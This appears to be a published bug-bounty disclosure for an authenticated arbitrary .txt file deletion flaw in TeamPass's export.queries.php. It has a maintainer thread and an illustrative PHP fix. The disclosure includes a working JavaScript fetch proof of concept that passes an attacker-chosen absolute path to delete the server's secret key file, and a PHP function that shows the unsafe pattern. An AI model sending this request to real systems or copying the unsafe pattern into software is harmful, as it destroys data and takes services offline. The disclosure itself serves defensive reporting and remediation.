Arbitrary txt files deletion (authenticated) in nilsteampassnet/teampass

Valid

Reported on Jan 21st 2023


Description

The file sources/export.queries.php can be abused by any authenticated user to delete arbitrary .txt files. If the system administrator configured the base path for teampass-seckey.txt to be /var/teampass, as shown in the official example, that file can be removed, causing a total disruption of the application (every page will return 500 Internal Server Error).

When the attack is executed, the original .txt file is deleted and a new file with the same name but without the extension is created. The new file contains some HTML plus the content of the original file encrypted with a password chosen by the attacker, making recovery of the original file impossible.

Proof of Concept

The following PoC assumes that the Teampass SaltKey is stored in /var/teampass/teampass-seckey.txt.

Login with any user (no special permission is required), open a browser console and execute the following JavaScript:

fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',            // reuse the logged-in session cookie
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',   // target path without the .txt extension
        pdf_password: 'GoodbyeSecretKey'         // password used to encrypt the copied content
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
});

Impact

This vulnerability can be used by an attacker with low privileges to delete arbitrary .txt files. It can lead to a total loss of availability if the path of teampass-seckey.txt is known.
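The root cause described above is that the `file` POST parameter reaches the delete-and-rewrite step without being confined to the export directory. The following is an added example, not TeamPass code and not the maintainer's fix; the function names, the `$exportDir` location and the demo file are assumptions. It places the unsafe pattern beside a hardened version that accepts only a bare file name and checks that the resolved path stays inside the export directory before writing or unlinking anything.

```php
<?php
// Added illustration, not TeamPass code. Function names and $exportDir are assumptions.

// Unsafe pattern: the caller-controlled path decides which .txt file gets deleted
// and where the HTML is written (as in the PoC: file=/var/teampass/teampass-seckey).
function finalize_export_unsafe(string $file, string $html): void
{
    file_put_contents($file, $html);   // creates /var/teampass/teampass-seckey
    unlink($file . '.txt');            // deletes /var/teampass/teampass-seckey.txt
}

// Hardened version: accept only a bare name, resolve it beneath the export
// directory and refuse anything that escapes it or does not exist there.
function finalize_export_safe(string $file, string $html, string $exportDir): bool
{
    // A bare name only: no directory parts, no "..", no NUL bytes.
    if ($file === '' || $file !== basename($file) || !preg_match('/^[A-Za-z0-9_-]+$/', $file)) {
        return false;
    }
    $base = realpath($exportDir);
    if ($base === false) {
        return false;
    }
    // realpath() returns false for a missing file and collapses symlinks, so a
    // planted link inside the export directory cannot redirect the unlink elsewhere.
    $txt = realpath($base . DIRECTORY_SEPARATOR . $file . '.txt');
    if ($txt === false || strncmp($txt, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    $out = $base . DIRECTORY_SEPARATOR . $file;   // same naming as described above, but confined
    if (file_put_contents($out, $html) === false) {
        return false;
    }
    return unlink($txt);
}

// Constructed demo: a temporary export directory holding one pending export.
$exportDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'teampass_export_demo';
if (!is_dir($exportDir)) {
    mkdir($exportDir, 0700);
}
file_put_contents($exportDir . DIRECTORY_SEPARATOR . 'export_123.txt', 'pending export');

// The PoC-style absolute path is refused by the bare-name check; the pending export is processed.
var_dump(finalize_export_safe('/var/teampass/teampass-seckey', '<html></html>', $exportDir));
var_dump(finalize_export_safe('export_123', '<html></html>', $exportDir));
```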

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. a year ago
Sonia Zorba modified the report a year ago
Sonia Zorba (Researcher), a year ago:

@admin I'm trying to submit a similar one for version 2.1.27.36 (that looks to be the last Teampass 2 supported version). A pop-up opens complaining about "It looks like you're trying to report multiple occurrences of a vulnerability you've already disclosed" and forces me to edit this submission. The vulnerability that I was trying to submit is almost the same, but for version 2 it is more critical since it can also be performed by anonymous users and so has a higher CVSS score. Also the PoC is different. How should I proceed? Thanks

We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back a year ago
We have sent a follow up to the nilsteampassnet/teampass team. We will try again in 4 days. a year ago
Nils Laumaillé (Maintainer), a year ago:

@admin I will fix the issue in branch 3. Branch 2 is not maintained anymore.

nilsteampassnet/teampass maintainer has acknowledged this report a year ago
Nils Laumaillé (Maintainer), a year ago:

@zonia3000, Fix has been released in commit https://github.com/nilsteampassnet/TeamPass/commit/0af3574caba27a61b16dc25c94fa51ae12d2d967

Nils Laumaillé validated this vulnerability a year ago
zonia3000 has been awarded the disclosure bounty
Nils Laumaillé marked this as fixed in 3.0.0.22 with commit 0af357 a year ago
This vulnerability has now been published a year ago
Sonia Zorba (Researcher), a year ago:

Thank you @nilsteampassnet!
